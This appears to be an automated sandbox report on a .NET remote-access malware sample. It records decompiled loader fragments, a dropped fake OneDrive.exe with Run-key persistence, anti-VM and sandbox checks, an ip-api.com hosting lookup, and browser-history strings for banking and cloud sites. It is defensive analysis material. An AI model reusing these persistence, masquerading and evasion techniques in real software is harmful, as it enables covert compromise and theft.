                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: version.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: wldp.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: profapi.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: amsi.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: userenv.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: b39wW3jYKO.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: b39wW3jYKO.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: b39wW3jYKO.exe | Static file information: File size 1334272 > 1048576
Source: b39wW3jYKO.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x12c200
Source: b39wW3jYKO.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER31B8.tmp.dmp.12.dr
Source: Binary string: System.Xml.ni.pdb source: WER31B8.tmp.dmp.12.dr
Source: Binary string: System.ni.pdbRSDS source: WER31B8.tmp.dmp.12.dr
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: b39wW3jYKO.exe, 00000000.00000002.4646804706.000001419AFB0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: b39wW3jYKO.exe, b39wW3jYKO.exe, 00000000.00000002.4646804706.000001419AFB0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WER31B8.tmp.dmp.12.dr
Source: Binary string: protobuf-net.pdbSHA256}Lq source: OneDrive.exe, 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2590105516.0000012971900000.00000004.08000000.00040000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.00000129695E2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER31B8.tmp.dmp.12.dr
Source: Binary string: mscorlib.pdb0 source: WER31B8.tmp.dmp.12.dr
Source: Binary string: protobuf-net.pdb source: OneDrive.exe, 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2590105516.0000012971900000.00000004.08000000.00040000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.00000129695E2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER31B8.tmp.dmp.12.dr
Source: Binary string: System.Configuration.pdb source: WER31B8.tmp.dmp.12.dr
Source: Binary string: System.Core.pdbH source: WER31B8.tmp.dmp.12.dr
Source: Binary string: System.Xml.pdb source: WER31B8.tmp.dmp.12.dr
Source: Binary string: System.pdb source: WER31B8.tmp.dmp.12.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER31B8.tmp.dmp.12.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WER31B8.tmp.dmp.12.dr
Source: Binary string: System.Core.ni.pdb source: WER31B8.tmp.dmp.12.dr
Source: Binary string: mscorlib.pdb source: WER31B8.tmp.dmp.12.dr
Source: Binary string: System.Configuration.pdb8e source: WER31B8.tmp.dmp.12.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER31B8.tmp.dmp.12.dr
Source: Binary string: System.Management.pdb source: WER31B8.tmp.dmp.12.dr
Source: Binary string: Microsoft.VisualBasic.pdbP4 source: WER31B8.tmp.dmp.12.dr
Source: Binary string: mscorlib.ni.pdb source: WER31B8.tmp.dmp.12.dr
Source: Binary string: System.Management.ni.pdb source: WER31B8.tmp.dmp.12.dr
Source: Binary string: System.Core.pdb source: WER31B8.tmp.dmp.12.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER31B8.tmp.dmp.12.dr
Source: Binary string: System.ni.pdb source: WER31B8.tmp.dmp.12.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER31B8.tmp.dmp.12.dr

Data Obfuscation

Source: arndry.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: arndry.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: b39wW3jYKO.exe, Client.cs | .Net Code: RunGetter System.AppDomain.Load(byte[])
Source: arndry.exe.0.dr, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
Source: arndry.exe.0.dr, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
Source: arndry.exe.0.dr, Messages.cs | .Net Code: Memory
Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, ReflectionHelper.cs | .Net Code: InvokeMethod
Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, XmlSerializationHelper.cs | .Net Code: ReadObjectProperties
Source: Yara match | File source: 14.2.OneDrive.exe.19a3725ea98.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.OneDrive.exe.12971b90000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.OneDrive.exe.129692f22f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.OneDrive.exe.129691f1eb8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.2657598951.0000019A3725E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2653178477.0000019A26E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2577826782.00000129591E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2592825263.0000012971B90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: OneDrive.exe PID: 3508, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: OneDrive.exe PID: 1472, type: MEMORYSTR
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD3466896B push edx; ret 0_2_00007FFD34668975
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34667D69 push esp; iretd 0_2_00007FFD34667D73
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34752870 pushfd ; iretd 0_2_00007FFD34752879
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD347529A6 push ss; iretd 0_2_00007FFD347529A7
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD347F2C81 push 8B48FFEDh; retf 0_2_00007FFD347F2C86
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD347F9E11 push eax; ret 0_2_00007FFD347F9E41
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD347FD189 push ecx; retf 0_2_00007FFD347FD1BC
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD347F0AAA push esp; iretd 0_2_00007FFD347F0AAB
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E461CA pushad ; retn 5EDBh 0_2_00007FFD34E4622D
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E4CDC2 push eax; iretd 0_2_00007FFD34E4CDC3
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E566B4 push DDEBE852h; iretd 0_2_00007FFD34E566D3
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E46664 push E8FFFFFFh; ret 0_2_00007FFD34E46669
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E5CF93 push ebp; iretd 0_2_00007FFD34E5CFC9
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E5D125 push esp; iretd 0_2_00007FFD34E5D126
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E5F103 push edx; iretd 0_2_00007FFD34E5F1C3
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E5F099 push edx; iretd 0_2_00007FFD34E5F1C3
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E5F214 push edx; iretd 0_2_00007FFD34E5F223
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E5F1F2 push edx; iretd 0_2_00007FFD34E5F1F3
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E5F1FA push edx; iretd 0_2_00007FFD34E5F1FB
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E5F1C4 push edx; iretd 0_2_00007FFD34E5F1CB
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E4A999 push eax; ret 0_2_00007FFD34E4A9B4
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E5AB46 pushad ; ret 0_2_00007FFD34E5AB9D
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E5F324 push ecx; iretd 0_2_00007FFD34E5F32B
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E5F2F2 push ecx; iretd 0_2_00007FFD34E5F2F3
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E5F2FA push ecx; iretd 0_2_00007FFD34E5F2FB
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E5F2FC push ecx; iretd 0_2_00007FFD34E5F323
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E5F2AC push ecx; iretd 0_2_00007FFD34E5F363
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E5F264 push edx; iretd 0_2_00007FFD34E5F26B
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E5F26C push edx; iretd 0_2_00007FFD34E5F273
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E5F3DC push 50CBE801h; iretd 0_2_00007FFD34E5F3F3
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E5F374 push ecx; iretd 0_2_00007FFD34E5F37B
Source: b39wW3jYKO.exe | Static PE information: section name: .text entropy: 7.869676343007641
Source: OneDrive.exe.0.dr | Static PE information: section name: .text entropy: 7.869676343007641

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File created: C:\Users\user\Documents\OneDrive.exe
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File created: C:\Users\user\AppData\Local\Temp\arndry.exe
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\34EF0CD5860992665E72 5C34AEE5196E0F8615B8D1D9017DD710EA28D2B7AC99295D46046D12EEA58D78
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
Source: Yara match	File source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTR
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: b39wW3jYKO.exe, 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2577826782.00000129591E0000.00000004.00000800.00020000.00000000.sdmp, arndry.exe, 00000009.00000002.2501821797.000000000239D000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 0000000E.00000002.2653178477.0000019A26E51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: arndry.exe, 00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmp, arndry.exe.0.dr	Binary or memory string: SBIEDLL.DLLINFO
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	Memory allocated: 14180770000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	Memory allocated: 1419A0D0000 memory reserve | memory write watch
Source: C:\Users\user\Documents\OneDrive.exe	Memory allocated: 12958EB0000 memory reserve | memory write watch
Source: C:\Users\user\Documents\OneDrive.exe	Memory allocated: 129710E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\arndry.exe	Memory allocated: 21E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\arndry.exe	Memory allocated: 1A390000 memory reserve | memory write watch
Source: C:\Users\user\Documents\OneDrive.exe	Memory allocated: 19A26DC0000 memory reserve | memory write watch
Source: C:\Users\user\Documents\OneDrive.exe	Memory allocated: 19A3EE50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\OneDrive.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\OneDrive.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	Window / User API: threadDelayed 6976
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	Window / User API: threadDelayed 2847
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5663
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4140
Source: C:\Users\user\Desktop\b39wW3jYKO.exe TID: 1016	Thread sleep count: 43 > 30
Source: C:\Users\user\Desktop\b39wW3jYKO.exe TID: 1016	Thread sleep time: -39660499758475511s >= -30000s
Source: C:\Users\user\Desktop\b39wW3jYKO.exe TID: 1924	Thread sleep count: 6976 > 30
Source: C:\Users\user\Desktop\b39wW3jYKO.exe TID: 1924	Thread sleep count: 2847 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 884	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\Documents\OneDrive.exe TID: 5648	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Documents\OneDrive.exe TID: 6068	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\arndry.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	File Volume queried: C:\ FullSizeInformation (3 identical entries)
Source: C:\Users\user\AppData\Local\Temp\arndry.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	File opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	File opened: C:\Windows\SYSTEM32\MSVFW32.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	File opened: C:\Windows\SYSTEM32\en-US\avicap32.dll.mui
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	File opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	File opened: C:\Windows\SYSTEM32\en-US\MSVFW32.dll.mui
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	File opened: C:\Windows\system32\wbem\en-US\wmiutils.dll.mui
Source: Amcache.hve.12.dr	Binary or memory string: VMware
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: Amcache.hve.12.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Amcache.hve.12.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Amcache.hve.12.dr	Binary or memory string: vmci.sys
Source: arndry.exe.0.dr	Binary or memory string: vmware
